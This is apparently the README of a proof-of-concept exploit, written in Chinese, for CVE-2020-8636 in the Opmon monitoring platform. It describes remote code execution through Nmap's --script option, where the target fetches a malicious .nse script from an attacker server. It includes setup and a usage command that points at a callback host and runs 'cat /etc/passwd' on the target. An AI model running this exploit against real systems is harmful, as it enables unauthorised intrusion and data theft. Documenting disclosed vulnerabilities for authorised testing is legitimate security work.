OpMonster

CVE-2020-8636 — 针对 Opmon 的已认证远程代码执行漏洞利用

关于 • 安装 • 用法 • 许可证

## 关于 OpMonster 是针对 **CVE-2020-8636** 的概念验证漏洞利用程序，这是 Opmon 监控平台中的一个远程代码执行漏洞。它滥用了 `nettools.php` endpoint，该 endpoint 允许你使用任意的 `--script` 选项运行 Nmap。 该漏洞利用程序使 Opmon 从你控制的服务器（通过 `http-fetch`）获取恶意的 `.nse` Nmap 脚本，将其释放到 `/tmp` 目录中， 然后运行该脚本以在目标上执行你的命令并打印输出。 由 [@phor3nsic](https://github.com/phor3nsic) 发现并开发。 更多详情：[Opmon 上的三个 CVE](https://phor3nsic.gitbook.io/aboutme/articles/three-cves-on-opmon)。 ## 安装 ``` git clone https://github.com/phor3nsic/opmonster cd opmonster pip install requests ``` ## 用法 首先，在目标可以访问的主机上启动一个 web 服务器，目录需能供生成的 `.nse` 脚本下载（该漏洞利用程序会将脚本写入当前目录）： ``` php -S 0.0.0.0:1337 ``` 然后使用四个位置参数运行该漏洞利用程序： ``` python3 opmonster.py https://vulnhost.com myhost.ngrok.io 80 "cat /etc/passwd" ``` | 参数 | 描述 | |----------|-------------| | `HOST` | 目标 Opmon 的基础 URL（例如 `https://vulnhost.com`） | | `LHOST` | 提供 `.nse` 脚本下载的服务器主机 | | `LPORT` | 你的服务器端口 | | `CMD` | 要在目标上执行的命令 | 如果目标未下载脚本（“不受此漏洞影响”）或无法与你的服务器建立外部连接，该漏洞利用程序将中止并显示提示信息。 ## 免责声明 仅供授权的安全测试和教育使用。你对如何使用它承担责任。 ## 许可证 [MIT](LICENSE) © [phor3nsic](https://github.com/phor3nsic)

标签：Python, 威胁模拟, 字符串匹配, 无后门, 网络信息收集, 逆向工具